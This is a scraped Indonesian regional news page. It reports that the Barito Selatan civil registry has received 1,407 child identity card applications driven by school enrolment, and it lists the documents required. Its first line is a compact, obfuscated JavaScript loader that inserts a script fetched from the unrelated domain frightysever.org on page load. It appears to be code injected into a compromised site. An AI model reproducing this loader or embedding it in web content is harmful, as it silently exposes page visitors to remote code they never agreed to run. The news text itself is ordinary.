(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Syarat Masuk Sekolah, Dukcapil Barsel Mencatat Ada 1.407 Pemohon KIA


BUNTOK, Dinas Kependudukan dan Catatan Sipil (Disdukcapil) Barito Selatan (Barsel) telah mendaftarkan Kartu Identitas Anak (KIA) sebanyak 1.407 anak, sampai pada Selasa (11/6).

Kepala Disdukcapil Barsel melalui Kabid Pendaftaran Penduduk, Misnawaty N Lambung mengatakan, karena adanya persyaratan pendaftaran sekolah dari TK hingga SMP harus menggunakan KIA, pihaknya hingga saat ini sudah menerima 1.407 permohonan KIA yang masuk.

“Jadi hingga sampai siang ini yang masuk data permohonan sudah 1407 dan yang sudah bisa dicetak hingga siang ini baru 1075,” kata Misnawaty kepada Kanalkalimantan.com, Selasa (11/6).

Ia mengatakan, maraknya permohanan KIA ini rata-rata dari pihak orang tua yang ingin mendaftar masuk sekolah baik dari TK hingga SMP dan untuk pemohon pada tingkat tersebut lebih diutamakan saat ini.

“Karena jadi untuk persyaratan masuk sekolah, makanya kita lebih mengutamkan untuk permohonan anak-anak yang ingin mendaftar sekolah tersebut,” ucap Misnawaty.

Lebih lanjut olehnya pihaknya untuk tahun 2019 ini telah mengadakan 6.000 keping untuk tanda KIA. Kalaupun habis pihak Disdukcapil Barsel telah antisifasi terlebih dahulu dengan mengusulkan lagi tambahan sebagai persediaan atau stok terlebih dahulu.

“Jadi 6.000 keping, sudah kita siapkan. Sementara hingga siang ini sudah terpakai 1.075 keping yang sudah dicetak KIA tersebut,” ujar Misnawaty.

Ditambahkan olehnya bahwa sementara prioritas utama dalam pencetakan KIA ini bertuju kepada para pendaftar sekolah dari TK hingga SMP. Adapun persyaratannya foto copy KTP orang tua suami istri, kartu kerluarga, akta kelahiran dan foto pemohon berwarna ukuran 4×6.

“Jadi prioritas kita saat ini untuk pendaftar sekolah akan lebih diutamakan, asal melengkapi berkas permohonan akan segera diproses,” pungkas Misnawaty. (digdo)

Reporter : Digdo
Editor : Bie

Desy Arfianty

Recent Posts

Musrenbang Kecamatan Selat Digelar, Ini Kata Wakil Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Musyawarah Perencanaan Pembangunan (Musrenbang) Tingkat Kecamatan Selat dalam rangka penyusunan Rencana… Read More

15 menit ago

Resmikan 166 Sekolah Rakyat, Prabowo Target 500 Sekolah Rakyat di 2029

KANALKALIMANTAN.COM, BANJARBARU - Presiden Republik Indonesia Prabowo Subianto didampingi sejumlah Menteri Kabinet Merah Putih dan… Read More

1 jam ago

Prabowo Janjikan Kampus Kedokteran Gratis

KANALKALIMANTAN.COM, BANJARBARU - Presiden Prabowo Subianto berkeinginan membuka banyak sekolah dan kampus. Ia memandang pendidikan… Read More

3 jam ago

Tiba di Banjarbaru, Presiden Prabowo Resmikan 166 Sekolah Rakyat

KANALKALIMANTAN.COM, BANJARBARU - Presiden Prabowo Subianto melakukan kunjungan kerja ke Kota Banjarbaru, Provinsi Kalimantan Selatan,… Read More

7 jam ago

Peluncuran Budaya Sekolah Aman dan Nyaman di Banjarbaru, Ini Kata Mendikdasmen Abdul Mu’ti

KANALKALIMANTAN.COM, BANJARBARU – Kota Banjarbaru menjadi salah satu titik penting peluncuran budaya sekolah aman dan… Read More

7 jam ago

Nilai TKA Jadi Syarat Wajib untuk Siswa Eligible SNBP 2026

KANALKALIMANTAN.COM, JAKARTA - Seleksi Nasional Berdasarkan Prestasi (SNBP) 2026 menjadi perhatian siswa kelas akhir SMA,… Read More

10 jam ago

This website uses cookies.